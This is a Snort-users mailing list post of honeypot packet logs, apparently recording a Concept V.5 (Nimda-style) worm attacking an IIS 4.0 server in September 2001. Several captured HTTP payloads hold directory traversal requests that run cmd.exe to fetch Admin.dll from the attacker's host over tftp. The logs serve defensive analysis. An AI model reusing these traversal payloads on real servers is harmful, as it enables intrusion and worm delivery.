000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll c:\Admin.dll
060 : 25 32 30 63 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20c:\Admin.dll
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host:
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25886) [2001-09-18 10:23:05] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=779 flags=0 offset=0 TTL=128 chksum=17709
TCP: port=80 -> dport: 3995 flags=***AP*** seq=637868
ack=491921464 off=5 res=0 win=8605 urp=0 chksum=26262
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 36 3A 34 36 20 47 4D 54 0D 0A 43 6F 6E 74 :06:46 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25887) [2001-09-18 10:23:05] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=1035 flags=0 offset=0 TTL=128 chksum=17808
TCP: port=80 -> dport: 3995 flags=***A***F seq=638223
ack=491921464 off=5 res=0 win=8605 urp=0 chksum=53875
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25901) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=22716 flags=0 offset=0 TTL=118 chksum=64222
TCP: port=3995 -> dport: 80 flags=*****R** seq=491921464
ack=0 off=5 res=0 win=0 urp=0 chksum=45366
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25902) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=22972 flags=0 offset=0 TTL=118 chksum=63962
TCP: port=4242 -> dport: 80 flags=******S* seq=491923784
ack=0 off=6 res=0 win=8192 urp=0 chksum=28533
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25903) [2001-09-18 10:23:06] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=3595 flags=0 offset=0 TTL=128 chksum=15244
TCP: port=80 -> dport: 4242 flags=***A**S* seq=638788
ack=491923785 off=6 res=0 win=8760 urp=0 chksum=44510
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25904) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=23228 flags=0 offset=0 TTL=118 chksum=14559
TCP: port=3995 -> dport: 80 flags=*****R** seq=491921464
ack=491921464 off=5 res=0 win=0 urp=0 chksum=29612
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25916) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=32700 flags=0 offset=0 TTL=119 chksum=53982
TCP: port=4242 -> dport: 80 flags=***A**** seq=491923785
ack=638789 off=5 res=0 win=8760 urp=0 chksum=50587
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25917) [2001-09-18 10:23:06] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=195 ID=32956 flags=0 offset=0 TTL=119 chksum=53571
TCP: port=4242 -> dport: 80 flags=***AP*** seq=491923785
ack=638789 off=5 res=0 win=8760 urp=0 chksum=33810
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll d:\Admin.dll
060 : 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20d:\Admin.dll
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host:
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25918) [2001-09-18 10:23:06] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=5131 flags=0 offset=0 TTL=128 chksum=13357
TCP: port=80 -> dport: 4242 flags=***AP*** seq=638789
ack=491923940 off=5 res=0 win=8605 urp=0 chksum=22617
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 36 3A 34 37 20 47 4D 54 0D 0A 43 6F 6E 74 :06:47 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 25919) [2001-09-18 10:23:06] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=5387 flags=0 offset=0 TTL=128 chksum=13456
TCP: port=80 -> dport: 4242 flags=***A***F seq=639144
ack=491923940 off=5 res=0 win=8605 urp=0 chksum=50231
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25928) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=46780 flags=0 offset=0 TTL=118 chksum=40158
TCP: port=4242 -> dport: 80 flags=*****R** seq=491923940
ack=0 off=5 res=0 win=0 urp=0 chksum=42643
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25929) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=47036 flags=0 offset=0 TTL=118 chksum=39898
TCP: port=4276 -> dport: 80 flags=******S* seq=491924169
ack=0 off=6 res=0 win=8192 urp=0 chksum=28114
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25930) [2001-09-18 10:23:06] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=7947 flags=0 offset=0 TTL=128 chksum=10892
TCP: port=80 -> dport: 4276 flags=***A**S* seq=639539
ack=491924170 off=6 res=0 win=8760 urp=0 chksum=43340
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25931) [2001-09-18 10:23:06] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=47292 flags=0 offset=0 TTL=118 chksum=56030
TCP: port=4242 -> dport: 80 flags=*****R** seq=491923940
ack=491923940 off=5 res=0 win=0 urp=0 chksum=24413
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25932) [2001-09-18 10:23:07] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=57276 flags=0 offset=0 TTL=119 chksum=29406
TCP: port=4276 -> dport: 80 flags=***A**** seq=491924170
ack=639540 off=5 res=0 win=8760 urp=0 chksum=49417
Payload: none
----------------------------------------------------------------------------
--
#(2 - 25933) [2001-09-18 10:23:07] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=195 ID=60604 flags=0 offset=0 TTL=119 chksum=25923
TCP: port=4276 -> dport: 80 flags=***AP*** seq=491924170
ack=639540 off=5 res=0 win=8760 urp=0 chksum=32639
Payload: length = 139
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste
020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t
030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243
040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d
050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll e:\Admin.dll
060 : 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20e:\Admin.dll
070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host:
080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne
----------------------------------------------------------------------------
--
#(2 - 25934) [2001-09-18 10:23:07] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=9483 flags=0 offset=0 TTL=128 chksum=9360
TCP: port=80 -> dport: 4276 flags=***A**** seq=639540
ack=491924325 off=5 res=0 win=8605 urp=0 chksum=49417
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26077) [2001-09-18 10:24:43] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=50956 flags=0 offset=0 TTL=118 chksum=35982
TCP: port=4966 -> dport: 80 flags=*****R** seq=502634226
ack=0 off=5 res=0 win=0 urp=0 chksum=13838
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26078) [2001-09-18 10:24:43] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=44 ID=51212 flags=0 offset=0 TTL=118 chksum=35722
TCP: port=5000 -> dport: 80 flags=******S* seq=502634388
ack=0 off=6 res=0 win=8192 urp=0 chksum=64911
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26079) [2001-09-18 10:24:43] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=44 ID=56846 flags=0 offset=0 TTL=128 chksum=27528
TCP: port=80 -> dport: 5000 flags=***A**S* seq=736589
ack=502634389 off=6 res=0 win=8760 urp=0 chksum=48622
Options:
#1 - MSS len=4 data=05B4
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26080) [2001-09-18 10:24:43] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=51468 flags=0 offset=0 TTL=118 chksum=51854
TCP: port=4966 -> dport: 80 flags=*****R** seq=502634226
ack=502634226 off=5 res=0 win=0 urp=0 chksum=33062
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26081) [2001-09-18 10:24:44] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=65292 flags=0 offset=0 TTL=119 chksum=21390
TCP: port=5000 -> dport: 80 flags=***A**** seq=502634389
ack=736590 off=5 res=0 win=8760 urp=0 chksum=54699
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26082) [2001-09-18 10:24:44] spp_unidecode: Unicode Directory
Transversal attack detected
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=116 ID=13 flags=0 offset=0 TTL=119 chksum=21058
TCP: port=5000 -> dport: 80 flags=***AP*** seq=502634389
ack=736590 off=5 res=0 win=8760 urp=0 chksum=4731
Payload: length = 74
000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..%
010 : 32 66 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C 2f../Admin.dll l
020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host:
030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F www..Connnectio
040 : 6E 3A 20 63 6C 6F 73 65 0D 0A n: close..
----------------------------------------------------------------------------
--
#(2 - 26083) [2001-09-18 10:24:44] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=279 ID=57102 flags=0 offset=0 TTL=128 chksum=27037
TCP: port=80 -> dport: 5000 flags=***AP*** seq=736590
ack=502634465 off=5 res=0 win=8684 urp=0 chksum=40987
Payload: length = 239
000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser
010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve
020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS
030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue,
040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16:
050 : 30 38 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74 65 08:24 GMT..Conte
060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht
070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng
080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html
090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72
><head><title>Er
0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61
ror</title></hea
0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The
spec
0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou
0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found.
0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E
</body></html>
----------------------------------------------------------------------------
--
#(2 - 26084) [2001-09-18 10:24:44] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=57358 flags=0 offset=0 TTL=128 chksum=27020
TCP: port=80 -> dport: 5000 flags=***A***F seq=736829
ack=502634465 off=5 res=0 win=8684 urp=0 chksum=54459
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26085) [2001-09-18 10:24:44] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=17933 flags=0 offset=0 TTL=118 chksum=3470
TCP: port=5000 -> dport: 80 flags=*****R** seq=502634465
ack=1819263436 off=5 res=0 win=0 urp=0 chksum=1729
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26100) [2001-09-18 10:24:47] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=395 ID=62478 flags=0 offset=0 TTL=128 chksum=21545
TCP: port=80 -> dport: 4276 flags=***AP*** seq=639540
ack=491924326 off=5 res=0 win=8605 urp=0 chksum=21445
Payload: length = 355
000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat
010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv
020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II
030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue
040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16
050 : 3A 30 38 3A 32 38 20 47 4D 54 0D 0A 43 6F 6E 74 :08:28 GMT..Cont
060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215.
070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t
080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea
090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69
d><title>Error i
0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio
0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E
n</title></head>
0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45
.<body><h1>CGI E
0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The
spe
0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli
0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave
100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni
110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se
120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header
130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers
140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar
150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70
e:<p><p><pre></p
160 : 72 65 3E re>
----------------------------------------------------------------------------
--
#(2 - 26101) [2001-09-18 10:24:47] Honeypot Data out
IPv4: XX.XX.XX.XX -> 65.29.243.180
hlen=5 TOS=0 dlen=40 ID=62734 flags=0 offset=0 TTL=128 chksum=21644
TCP: port=80 -> dport: 4276 flags=***A***F seq=639895
ack=491924326 off=5 res=0 win=8605 urp=0 chksum=49060
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26102) [2001-09-18 10:24:47] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=43279 flags=0 offset=0 TTL=118 chksum=43659
TCP: port=4276 -> dport: 80 flags=*****R** seq=491924326
ack=502634566 off=5 res=0 win=0 urp=0 chksum=61107
Payload: none
----------------------------------------------------------------------------
--
#(2 - 26103) [2001-09-18 10:24:48] Honeypot Data
IPv4: 65.29.243.180 -> XX.XX.XX.XX
hlen=5 TOS=0 dlen=40 ID=44047 flags=0 offset=0 TTL=118 chksum=59275
TCP: port=4276 -> dport: 80 flags=*****R** seq=491924326
ack=491924326 off=5 res=0 win=0 urp=0 chksum=23607
Payload: none
_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Packet logs of Concept V.5 infection Steve Halligan (Sep 18)